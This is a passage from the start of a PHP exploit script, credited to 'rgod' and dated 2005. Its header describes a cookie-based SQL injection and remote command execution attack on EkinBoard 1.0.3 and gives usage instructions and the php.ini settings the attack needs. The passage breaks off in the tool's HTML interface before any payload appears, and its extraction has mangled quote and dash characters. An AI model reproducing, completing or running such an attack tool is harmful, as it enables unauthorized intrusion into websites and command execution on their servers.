1 <?php
2 #
3 # −−−ekin103_xpl.php 10.47 16/11/2005 #
4 # #
5 # EkinBoard 1.0.3 config.php SQL Injection through cookie / #
6 # remote commands execution #
7 # −−−> (this works with magic_quotes_gpc off) #
8 # #
9 # coded by rgod #
10 # site: http://rgod.altervista.org #
11 # #
12 # usage: launch from Apache, fill in requested fields, then go! #
13 # #
14 # required php.ini settings to launch this script: #
15 # allow_call_time_pass_reference = on #
16 # register_globals = on #
17 # #
18 # Sun−Tzu: "The rising of birds in their flight is the sign of an ambuscade. #
19 # Startled beasts indicate that a sudden attack is coming." #
20
21 error_reporting(0);
22 ini_set("max_execution_time",0);
23 ini_set("default_socket_timeout", 2);
24 ob_implicit_flush (1);
25
26 echo’<html><head><title>EkinBoard 1.0.3 config.php SQL Injection / cmmnds xctn
27 </title><meta http−equiv="Content−Type" content="text/html; charset=iso−8859−1">
28 <style type="text/css"> body {background−color:#111111; SCROLLBAR−ARROW−COLOR:
29
#ffffff; SCROLLBAR−BASE−COLOR: black; CURSOR: crosshair; color: #1CB081; } img
30
{background−color: #FFFFFF !important} input {background−color: #303030
31
!important} option { background−color: #303030 !importa